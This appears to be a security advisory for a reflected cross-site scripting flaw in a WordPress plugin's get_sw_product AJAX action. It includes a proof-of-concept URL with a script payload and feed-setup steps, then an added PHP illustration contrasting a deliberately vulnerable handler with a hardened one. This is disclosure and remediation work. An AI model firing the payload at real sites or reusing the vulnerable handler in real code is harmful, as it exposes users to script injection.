The plugin does not sanitise and escape a parameter before outputting it back via an AJAX action (available to both unauthenticated and authenticated users), leading to a Reflected Cross-Site Scripting.

With a feed set in the plugin, open the URL below:

https://example.com/wp-admin/admin-ajax.php?action=get_sw_product&title=%3Cscript%3Ealert(`xss`);%3C/script%3E

Note: To set a feed, simply import the following CSV via the plugin:

categoryName,awDeepLink,merchantDeepLink,awImageUrl,description,productName,deliveryCost,currency,price
categoryName,awDeepLink,merchantDeepLink,awImageUrl,description,productName,deliveryCost,currency,price
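The advisory names the root cause (a request parameter reflected into the AJAX response without sanitisation or escaping) but not the plugin code. The snippet below is an added illustration, not the affected plugin's code: a hypothetical handler showing that unsafe pattern next to a hardened version using WordPress's own sanitisation and escaping helpers. The action name get_sw_product and the title parameter are taken from the PoC URL; the function names sw_get_product_vulnerable and sw_get_product_hardened and the nonce action sw_product_nonce are assumptions.

```php
<?php
// Added illustrative example, not the affected plugin's code.
// Action name 'get_sw_product' and parameter 'title' come from the
// advisory's PoC URL; the function and nonce names are assumptions.

// Unsafe pattern: the raw 'title' parameter is written straight into
// the response body, so any markup it contains is rendered by the
// browser of whoever opened the link (a reflected XSS).
function sw_get_product_vulnerable() {
    $title = isset( $_GET['title'] ) ? $_GET['title'] : '';
    echo '<h2>' . $title . '</h2>';
    wp_die();
}

// Hardened pattern: sanitise on input (strip tags, normalise whitespace)
// and escape on output (entity-encode for an HTML context). The nonce
// check additionally stops the endpoint being driven by an arbitrary
// cross-site link, but it is not a substitute for escaping.
function sw_get_product_hardened() {
    check_ajax_referer( 'sw_product_nonce', 'nonce' );
    $title = isset( $_GET['title'] )
        ? sanitize_text_field( wp_unslash( $_GET['title'] ) )
        : '';
    echo '<h2>' . esc_html( $title ) . '</h2>';
    wp_die();
}

// Both hooks are registered because the advisory notes the action is
// reachable by unauthenticated (nopriv) and authenticated users; the
// hardened handler must be wired to both, or the fix is incomplete.
add_action( 'wp_ajax_get_sw_product',        'sw_get_product_hardened' );
add_action( 'wp_ajax_nopriv_get_sw_product', 'sw_get_product_hardened' );
```

Two points worth checking when reviewing a fix for an issue like this: that the escaping function matches the output context (esc_html() for element content, esc_attr() for attribute values, esc_url() for hrefs), and that the same handler is hooked for both wp_ajax_ and wp_ajax_nopriv_, since patching only the authenticated path leaves the unauthenticated one exposed. If the endpoint returns structured data rather than HTML, wp_send_json() is preferable, as it sets an application/json content type that browsers will not render as markup.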
cydave
Yes
2022-06-16 (about 7 months ago)
2022-07-27 (about 6 months ago)